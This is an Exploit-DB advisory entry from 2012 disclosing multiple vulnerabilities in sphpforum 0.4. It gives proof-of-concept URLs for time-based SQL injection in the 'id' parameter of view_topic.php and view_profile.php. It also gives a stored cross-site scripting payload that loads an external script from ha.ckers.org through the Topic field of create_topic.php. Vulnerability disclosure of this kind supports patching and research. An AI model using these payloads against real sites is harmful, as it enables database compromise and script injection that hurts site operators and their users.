sphpforum 0.4 - Multiple Vulnerabilities

Author: loneferret
type: webapps
platform: php
port: 
date_added: 2012-08-15  
date_updated: 2012-08-15  
verified: 1  
codes: OSVDB-85455;OSVDB-85454;OSVDB-85453  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-15-at-52013-pm.png  
application_url: http://www.exploit-db.comsphpforum.tar.gz  

raw file: 20546.txt  

# Author: loneferret of Offensive Security
# Product: sphpforum
# Version: 0.4 (older versions may be affected)
#
# Software Download: http://sourceforge.net/projects/sphpforum/

# Description:
# Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple,
# fast and allow easy integration into any existing web site.

# Vulnerability:
# Due to improper input sanitation, parameters are prone to SQL injection. Stored
# crossed site scripting is also present in some forms.

# PoC 1:
# SQL Injection
# Page: view_topic.php / view_profile.php?
# Vulnerable param: 'id'
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271

# PoC 2:
# Stored XSS
# Page: create_topic.php
# Vulnerable field: Topic
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>